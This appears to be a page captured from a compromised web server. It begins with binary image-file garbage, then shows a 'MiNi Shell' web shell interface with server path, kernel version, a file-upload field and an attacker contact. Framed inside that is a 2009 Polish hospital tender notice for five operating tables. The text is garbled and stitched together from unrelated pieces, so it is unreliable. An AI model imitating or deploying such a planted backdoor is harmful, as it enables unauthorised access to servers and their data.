JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090226/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20090226/42622-N-2009.html

<p class="kh_header"><b>Radom: Zakup urządzeń medycznych dla potrzeb Bloku Operacyjnego Chirurgicznego 
Radomskiego Szpitala Specjalistycznego - stołów operacyjnych (szt.5)</b><br>
<b>Numer ogłoszenia: 42622 - 2009; data zamieszczenia: 26.02.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Radomski Szpital Specjalistyczny im. dr Tytusa Chałubińskiego , ul. Tochtermana 1, 26-610 Radom, woj. mazowieckie, tel. 048 3615285, 3615284, faks 048 3615213.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital.radom.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b>  Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup urządzeń medycznych dla potrzeb Bloku Operacyjnego Chirurgicznego 
Radomskiego Szpitala Specjalistycznego - stołów operacyjnych (szt.5).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje  zakup i dostawę wraz z montażem urządzeń medycznych dla potrzeb Bloku Operacyjnego Chirurgicznego Radomskiego Szpitala Specjalistycznego - stołów operacyjnych (szt. 5).


STÓŁ OPERACYJNY - SZT. 4

Lp.	Parametry wymagane
1.		Stół operacyjny z blatem min. 5 segmentowym: podgłówek, płyta plecowa górna, płyta plecowa dolna, płyta siedzeniowa, podnóżek dwuczęściowy
2.		Stół operacyjny mobilny z podwójnymi kołami o średnicy większej równej 150 mm z centralną blokadą kół. Centralna blokada kół w postaci elektromechanicznie wysuwanych nóżek, na których stół musi stać podczas zabiegu. 
3.		Napęd stołu elektromechaniczny.
4.		Stół wyposażony w zasilanie akumulatorowe i sieciowe.
5.		Zasilacz stołu (ładowarka) zintegrowany w podstawie stołu (nie dopuszcza się ładowarek/ zasilaczy zewnętrznych).
6.		Podstawa i rama blatu (wszystkie jej elementy metalowe)stołu wykonane w całości ze stali nierdzewnej. Nie dopuszcza się stopów metali lekkich.(z wyłączeniem elementów przegubów)
7.		Blat stołu wyposażony w materace bezszwowe, przeciwodleżynowe, zdejmowane, bez rzepów o grubości min. 50mm. Blat przezierny dla promieniowania rtg na całej długości stołu, bez metalowych szyn poprzecznych.
8.		Blat stołu modułowy z możliwością montażu płyty plecowej, podgłówka, podnóżka i innych segmentów (np. z włókien węglowych) z obu stron stołu operacyjnego.
9.		Obsługa funkcji stołu z pilota kablowego przez układ elektromechaniczny:
-regulacja wysokości
-przechyły boczne
-Trendelenburg/Antytrendelenburg
-pozycja flex/reflex
-płyta nożna
-płyta plecowa dolna
-pozycja standardowa
-wysuwanie nóżek z podwozia
10.		Możliwość pełnej obsługi funkcji stołu z panelu sterującego (pełniącego również rolę sterownika awaryjnego) umieszczonego na kolumnie stołu.
11.		Mikroprocesorowy sterownik stołu w pełni kompatybilny z systemami Zintegrowanej Sali Operacyjnej co najmniej jednej z firm takich jak: Storz, Wolf, Stryker, Olympus
12.		Kolumna wyposażona w panel do awaryjnego sterowana stołem zlokalizowanym na bocznej (lewej lub prawej w stosunku do osi głównej stołu) powierzchni kolumny stołu. W celu aktywowania danej funkcji z panelu wymagana jest konieczność naciśnięcia dwóch przycisków jednocześnie dla uniknięcia przypadkowej aktywacji panelu). 
13.		Pilot bezprzewodowy z sygnalizacją stanu naładowania akumulatorów. Dodatkowy pilot bezprzewodowy (jeden na wszystkie zestawy stołów). 
14.		Serwisowanie, przeprowadzanie testów okresowych przez modem
15.		Regulacja wysokości blatu mniejszej równej 700mm do większej równej 1100mm
16.		Całkowita szerokość blatu 580mm (+/- 10mm)
17.		Przechyły boczne większe równe 25o
18.		Przechyły Trendelenburga 30o (+/- 5o)
19.		Przechyły Antytrendelenburga 30o (+/-5 o)
20.		Przesuw wzdłużny blatu większy równy 250mm
21.		Podgłówek regulowany w zakresie większy równy +/- 55o
22.		Podnóżek regulowany w zakresie większy równy +90o /-100o w płaszczyźnie góra, dół i rozchylany równolegle na boki w zakresie co najmniej 25cm lub/i odwodzony w  płaszczyźnie poziomej do +90 o  w każdą stronę od osi długiej blatu.
23.		Płyta plecowa dolna regulowana w zakresie  większa równa +80o/-40o
24.		Płyta plecowa górna regulowana w zakresie  większa równa +90o/-60o
25.		Stół przystosowany do zabiegów bariatrycznych- obciążalność stołu większa równa 350kg.
26.		Gwarancja na stoły operacyjne min. 36 m-cy, w tym na akumulatory min. 12 m-cy
Oprzyrządowanie (zbiorczo) do stołów
27.		Podpora anestezjologiczna pod rękę z regulacją kąta i wysokości z możliwością dowolnego ułożenia ręki względem stołu.	8 szt.
28.		Podgłówek podkowa do operacji laryngologicznych i okulistycznych	1 szt.
29.		Krążek żelowy śr. min 200mm	4 szt.
30.		Podpora pod rękę do ułożeń bocznych z zaciskiem do szyny.	2 szt.
31.		Podpora Goepela do zabiegów urologicznych/ginekologicznych z kompletem zacisków do szyn bocznych.	4 szt.
32.		Miska urologiczna z adapterem do szyny bocznej.	1 szt.
33.		Ekran anestozjologiczny	4 szt.
34.		Pas ciała pacjenta	4 szt.
35.		Stolik do operacji ręki, przezierny dla RTG, mocowany do szyny bocznej.	1 szt.
36.		Przystawka neurochirurgiczna (typu Mayfield lub Doro)	1 kpl.
37.		Podpora do ułożeń bocznych z możliwością regulacji wysokości, wysunięcia, pochyleń oraz możliwością obrotu o 360st. Sześć z poduszką dużą (ok. 200x170) dwie z małą (ok. 80 x 80)	8 szt.
38.		Wieszak do płynów infuzyjnych z czterema haczykami mocowany na szynę boczną.	4 szt.
39.		Taca na narzędzia przykręcana do szyny bocznej.	2 szt.
40.		Wózek na wyposażenie (min.2 szyny boczne i jeden kosz każdy)	4 szt.

STÓŁ OPERACYJNY - ORTOPEDYCZNY - SZT. 1
Lp.	Parametry wymagane
1.		Stół operacyjny na podstawie w kształcie litery T z łatwo poruszającymi się kółkami do przemieszczania stołu do przodu, do tyłu, na boki.
2.		Blat podzielony na kilka sekcji:
a)  trzyczęściowa część plecowa z dwoma zdejmowanymi segmentami obojczykowymi
b) płyta siedzeniowa z dwoma odejmowanymi elementami pośladkowymi ułatwiającymi dostęp operatorowi i ramienia C
c) para płyt podnogowych z możliwością demontażu
3.		Część plecowa regulowana elektrohydraulicznie może być zdemontowana, celem przymocowania specjalnie do tego celu przeznaczonych akcesoriów
4.		Belki wyciągowe regulowane osobno za pomocą złącz obrotowych.
5.		Zdejmowane poduszki na blacie stołu muszą być przezierne dla RTG.
6.		Możliwość zastosowania ramion wyciągowych z włókien węglowych
7.		Możliwość zastosowania blatu z włókien węglowych do operacji miednicy.
8.		Możliwość zainstalowania zestawu do operacji wymiany stawu biodrowego z dostępu przedniego.
9.		Wysokość stołu 810 mm z możliwością podwyższenia o co najmniej  35 cm
10.		Przechył boczny lewo/prawo:  20/20 stopni
11.		Pozycja Trendelenburga / pozycja anty-Trendelenburga: 30/25 stopni.
12.		Podniesienie części plecowej co najmniej 60 stopni.
13.		Możliwość sterowania pilotem na podczerwień  i sterownikiem kablowym.
14.		Pozycja 0 (powrót z pozycji bocznej i Trendelenburga).
15.		Zasilanie z sieci 230 V 50-60 Hz oraz z akumulatorów, których pojemność wystarcza na około dwa tygodnie. 
Ładowarka wbudowana w podstawę stołu, kabel zasilający ze zwijarką automatyczną, sygnalizator naładowania akumulatorów.
16.		Gwarancja na stół min. 36 m-cy, w tym na akumulatory min. 12 m-cy
	Oprzyrządowanie do stołu
17.		Płyta pod stopy z rzepami	2 szt.
18.		Kołek zaporowy	1 szt.
19.		Zacisk do uchwytu Kirschnera	1 szt.
20.		Zacisk obrotowy i wahadłowy	1 szt.
21.		Teleskopowe belki wyciągowe z możliwością dostosowania do wzrostu pacjenta 	2 szt.
22.		Podgłówek	1 szt.
23.		Podpórka anestezjologiczna pod rękę z regulacją kąta i wysokości z możliwością dowolnego ułożenia ręki względem stołu.	2 szt.
24.		Ekran anestezjologiczny	1 szt.
25.		Mankiet do ręki	1 szt.
26.		Pas mocujący	1 szt.
27.		Uchwyt z szyną na akcesoria	1 szt.
28.		Wieszak do kroplówek z czterema haczykami mocowany na szynę boczną.	2 szt.
29.		Akcesoria do operowania kości udowej w pozycji bocznej:
-	kołek zaporowy, 
-	uchwyt do podnóżków	1 kpl.
30.		Akcesoria do kości piszczelowej 
-	zestaw wyciągowy, 
-	stabilizator do kolana	1 kpl.
31.		Akcesoria do kości ramiennej :
-	wyciąg do kości ramiennej, 
-	urządzenie zaporowe, 
-	wyciąg Weinbergera	1 kpl.
32.		Akcesoria do chirurgii reki:
-	płyta do układania ramienia przy złamaniach stawu łokciowego, 
-	stolik do operacji ręki wraz z uchwytami mocującymi przezierny dla RTG	1 kpl.
33.		Akcesoria do chirurgii barku:
-	podgłówek specjalistyczny typu- hełm	1 szt.
34.		Akcesoria do chirurgii kolana: 
-	zestaw do artroskopii z podpórką	1 kpl.
35.		Akcesoria do chirurgii biodra: 
-	podpórka pośladkowa, 
-	podpórka łonowa, 
-	podpórka boczna wypukła, 
-	podpórka boczna okrągła, 
-	przedłużenie blatu wraz z odpowiednimi złączkami	1 kpl..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 33.19.22.30-3.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 90.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający określa wadium w wysokości: 22 000,00 zł (słownie: dwadzieścia dwa tysiące złotych 00/100).<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> I. Warunki ogólne: Wykonawca nie może podlegać wykluczeniu z postępowania o udzieleniu zamówienia na podstawie art. 24, ust. 1 i ust. 2 ustawy Prawo zamówień publicznych.
II. Warunki szczegółowe:
1)	Potencjał kadrowy: Wykonawca dysponuje osobami zdolnymi do wykonania zamówienia lub przedstawi pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia. Powyższy warunek powinien być spełniony łącznie przez podmioty składające wspólną ofertę.
2)	Doświadczenie: Wykonawca musi wykazać, że zrealizował w okresie ostatnich 3 lat kalendarzowych przed dniem wszczęcia postępowania, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, min 2 dostawy odpowiadające swoim rodzajem i wartością dostawom stanowiącym przedmiot zamówienia. Powyższy warunek powinien być spełniony łącznie przez podmioty składające wspólną ofertę.
3)	Potencjał techniczny: Wykonawca dysponuje potencjałem technicznym niezbędnym do wykonania zamówienia lub przedstawi pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego. Powyższy warunek powinien być spełniony łącznie przez podmioty składające wspólną ofertę
4)	Potencjał finansowo-ekonomiczny: Wykonawca dysponuje własnymi środkami finansowymi zapewniającymi wykonanie zamówienia. Powyższy warunek powinien być spełniony łącznie przez podmioty składające wspólną ofertę
III. Ocena spełniania warunków wymaganych od Wykonawców zostanie dokonana na podstawie załączonych dokumentów i oświadczeń wg. formuły spełnia- nie spełnia.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.	Oświadczenie Wykonawcy, że nie podlega wykluczeniu na podstawie art. 24, ust. 1 i ust. 2 ustawy Pzp - zał. Nr 1 do oferty.
2.	Oświadczenie Wykonawcy  o spełnianiu warunków  określonych w art. 22 ust 1, pkt. 1-3 ustawy Pzp - zał. Nr 2 do oferty.
3.	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, albo w przypadku Wykonawcy, który ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej - składa on dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzający, że nie otwarto jego likwidacji, ani nie ogłoszono jego upadłości. Jeżeli w kraju pochodzenia osoby, lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa  powyżej, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiedniego kraju pochodzenia osoby, lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
4.	Informacja o doświadczeniu zawodowym Wykonawcy (Doświadczenie zawodowe). Wykaz wykonanych w okresie ostatnich 3 lat kalendarzowych przed dniem wszczęcia postępowania, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, dostaw odpowiadających swoim rodzajem i wartością dostawom stanowiącym przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców. Informacja musi potwierdzać spełnienie warunku o którym mowa w pkt II ppkt 2) powyżej. Do informacji muszą być załączone dokumenty potwierdzające, że wymienione w informacji dostawy zostały wykonane należycie. - zał. Nr 3 do oferty.
5.	Zaświadczenie podmiotu uprawnionego do kontroli jakości potwierdzającego, że dostarczony przedmiot zamówienia odpowiada określonym normom lub specyfikacjom technicznym, tj.
-deklaracja zgodności CE wystawiona przez producenta lub
-certyfikat jednostki notyfikowanej uczestniczącej w procesie notyfikacji zgodnie z ustawą z 20 kwietnia 2004 r. o wyrobach medycznych (tekst jedn. Dz. U. z 2004 r. Nr 93 poz. 896) lub
-zaświadczenie o wpisie do Rejestru Produktów Leczniczych, Wyrobów Medycznych i Produktów Biobójczych oferowanego towaru.
6.	Wypełnioną specyfikację techniczną - zał. Nr 4 do oferty.
7.	Katalogi, foldery, itp. oferowanego urządzenia medycznego.
8.	Parafowany Wzór Umowy - zgodnie z Rozdziałem IV SIWZ.
9.	Wypełniony formularz oferty wraz z formularzem cenowy (zał. Nr 5  do oferty).
10.	Dowód wniesienia wadium.
11. Pełnomocnictwo do reprezentowania, o ile ofertę składa pełnomocnik.
11.1.	Zasady składania oferty przez podmioty występujące wspólnie - Podmioty zobowiązane są do złożenia wraz z ofertą pełnomocnictwa  do reprezentowania wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.szpital.radom.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> RADOMSKI  SZPITAL  SPECJALISTYCZNY
im. Dr Tytusa Chałubińskiego
ul. Lekarska 4
26-610 Radom
Dział Zamówień Publicznych i Zaopatrzenia
III piętro, pok. 309A.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.03.2009 godzina 12:00, miejsce: RADOMSKI  SZPITAL  SPECJALISTYCZNY
im. Dr Tytusa Chałubińskiego
ul. Lekarska 4
26-610 Radom
Dział Zamówień Publicznych i Zaopatrzenia
III piętro, pok. 309A.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com